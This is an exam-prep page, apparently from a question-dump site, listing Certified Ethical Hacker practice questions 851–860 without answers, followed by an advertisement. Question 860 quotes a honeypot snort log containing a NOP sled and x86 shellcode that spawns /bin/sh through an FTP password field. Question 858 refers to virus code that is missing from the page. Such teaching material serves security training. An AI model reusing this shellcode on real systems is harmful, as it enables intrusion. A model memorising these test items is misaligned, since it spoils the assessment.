CEH-001 Exam Details

  • Exam Code
    :CEH-001
  • Exam Name
    :Certified Ethical Hacker (CEH)
  • Certification
    :GAQM Certifications
  • Vendor
    :GAQM
  • Total Questions
    :878 Q&As
  • Last Updated
    :Jul 10, 2026

GAQM CEH-001 Online Questions & Answers

  • Question 851:

    One of the effective DoS/DDoS countermeasures is 'Throttling'. Which statement correctly defines this term?

    A. Set up routers that access a server with logic to adjust incoming traffic to levels that will be safe for the server to process
    B. Providers can increase the bandwidth on critical connections to prevent them from going down in the event of an attack
    C. Replicating servers that can provide additional failsafe protection
    D. Load balance each server in a multiple-server architecture

  • Question 852:

    A particular database threat utilizes a SQL injection technique to penetrate a target system. How would an attacker use this technique to compromise a database?

    A. An attacker uses poorly designed input validation routines to create or alter SQL commands to gain access to unintended data or execute commands of the database
    B. An attacker submits user input that executes an operating system command to compromise a target system
    C. An attacker gains control of system to flood the target system with requests, preventing legitimate users from gaining access
    D. An attacker utilizes an incorrect configuration that leads to access with higher-than- expected privilege of the database

  • Question 853:

    What is the name of the software tool used to crack a single account on Netware Servers using a dictionary attack?

    A. NPWCrack
    B. NWPCrack
    C. NovCrack
    D. CrackNov
    E. GetCrack

  • Question 854:

    John is discussing security with Jane. Jane had mentioned to John earlier that she suspects an LKM has been installed on her server. She believes this is the reason that the server has been acting erratically lately. LKM stands for Loadable Kernel Module.

    What does this mean in the context of Linux Security?

    A. Loadable Kernel Modules are a mechanism for adding functionality to a file system without requiring a kernel recompilation.
    B. Loadable Kernel Modules are a mechanism for adding functionality to an operating- system kernel after it has been recompiled and the system rebooted.
    C. Loadable Kernel Modules are a mechanism for adding auditing to an operating-system kernel without requiring a kernel recompilation.
    D. Loadable Kernel Modules are a mechanism for adding functionality to an operating- system kernel without requiring a kernel recompilation.

  • Question 855:

    Liza has forgotten her password to an online bookstore. The web application asks her to key in her email so that they can send her the password. Liza enters her email [email protected]'. The application displays server error. What is wrong with the web application?

    A. The email is not valid
    B. User input is not sanitized
    C. The web server may be down
    D. The ISP connection is not reliable

  • Question 856:

    Which of the following commands runs snort in packet logger mode?

    A. ./snort -dev -h ./log
    B. ./snort -dev -l ./log
    C. ./snort -dev -o ./log
    D. ./snort -dev -p ./log

  • Question 857:

    While checking the settings on the internet browser, a technician finds that the proxy server settings have been checked and a computer is trying to use itself as a proxy server. What specific octet within the subnet does the technician see?

    A. 10.10.10.10
    B. 127.0.0.1
    C. 192.168.1.1
    D. 192.168.168.168

  • Question 858:

    ViruXine.W32 virus hides their presence by changing the underlying executable code. This Virus code mutates while keeping the original algorithm intact, the code changes itself each time it runs, but the function of the code (its semantics) will not change at all.

    Here is a section of the Virus code:

    What is this technique called?

    A. Polymorphic Virus
    B. Metamorphic Virus
    C. Dravidic Virus
    D. Stealth Virus

  • Question 859:

    Jackson discovers that the wireless AP transmits 128 bytes of plaintext, and the station responds by encrypting the plaintext. It then transmits the resulting ciphertext using the same key and cipher that are used by WEP to encrypt subsequent network traffic. What authentication mechanism is being followed here?

    A. no authentication
    B. single key authentication
    C. shared key authentication
    D. open system authentication

  • Question 860:

    Exhibit:

    TCP TTL:50 TOS:0? ID:53476 DF

    *****PA* Seq: 0x33BC72AD Ack: 0x110CE81E Win: 0x7D78

    TCP Options => NOP NOP TS: 126045057 105803098

    50 41 53 53 20 90 90 90 90 90 90 90 90 90 90 90 PASS ...........

    90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................

    90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................

    90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................

    90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................

    90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................

    90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................

    90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................

    90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................

    90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................

    90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................

    90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................

    90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................

    90 90 90 90 90 90 90 31 C0 31 DB 31 C9 B0 46 CD .......1.1.1..F.

    80 31 C0 31 DB 43 89 D9 41 B0 3F CD 80 EB 6B 5E .1.1.C..A.?...k^

    31 C0 31 C9 8D 5E 01 88 46 04 66 B9 FF FF 01 B0 1.1..^..F.f.....

    27 CD 80 31 C0 8D 5E 01 B0 3D CD 80 31 C0 31 DB `..1..^..=..1.1.

    8D 5E 08 89 43 02 31 C9 FE C9 31 C0 8D 5E 08 B0 .^..C.1...1..^..

    0C CD 80 FE C9 75 F3 31 C0 88 46 09 8D 5E 08 B0 .....u.1..F..^..

    3D CD 80 FE 0E B0 30 FE C8 88 46 04 31 C0 88 46 =.....0...F.1..F

    07 89 76 08 89 46 0C 89 F3 8D 4E 08 8D 56 0C B0 ..v..F....N..V..

    0B CD 80 31 C0 31 DB B0 01 CD 80 E8 90 FF FF FF ...1.1..........

    FF FF FF 30 62 69 6E 30 73 68 31 2E 2E 31 31 76 ...0bin0sh1..11v

    65 6E 67 6C 69 6E 40 6B 6F 63 68 61 6D 2E 6B 61 [email protected]

    73 69 65 2E 63 6F 6D 0D 0A sie.com..

    =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

    12/09-01:22:31.169534 172.16.1.104:21 -> 207.219.207.240:1882

    TCP TTL:63 TOS:0?0 ID:48231 DF

    *****PA* Seq: 0x110CE81E Ack: 0x33BC7446 Win: 0x7D78

    TCP Options => NOP NOP TS: 105803113 126045057

    35 33 30 20 4C 6F 67 69 6E 20 69 6E 63 6F 72 72 530 Login incorr

    65 63 74 2E 0D 0A ect...

    =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

    12/09-01:22:39.878150 172.16.1.104:21 -> 207.219.207.240:1882 TCP TTL:63 TOS:0?0

    ID:48233 DF

    *****PA* Seq: 0x110CE834 Ack: 0x33BC7447 Win: 0x7D78

    TCP Options => NOP NOP TS: 105803984 126045931

    32 32 31 20 59 6F 75 20 63 6F 75 6C 64 20 61 74 221 You could at

    20 6C 65 61 73 74 20 73 61 79 20 67 6F 6F 64 62 least say goodb 79 65 2E 0D 0A ye...

    =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

    12/09-01:22:39.880154 172.16.1.104:21 -> 207.219.207.240:1882

    TCP TTL:63 TOS:0?0 ID:48234 DF

    ***F**A* Seq: 0x110CE859 Ack: 0x33BC7447 Win: 0x7D78

    TCP Options => NOP NOP TS: 105803984 126045931

    Given the following extract from the snort log on a honeypot, what service is being exploited? :

    A. FTP
    B. SSH
    C. Telnet
    D. SMTP

Tips on How to Prepare for the Exams

Nowadays, the certification exams become more and more important and required by more and more enterprises when applying for a job. But how to prepare for the exam effectively? How to prepare for the exam in a short time with less efforts? How to get a ideal result and how to find the most reliable resources? Here on Vcedump.com, you will find all the answers. Vcedump.com provide not only GAQM exam questions, answers and explanations but also complete assistance on your exam preparation and certification application. If you are confused on your CEH-001 exam preparations and GAQM certification application, do not hesitate to visit our Vcedump.com to find your solutions here.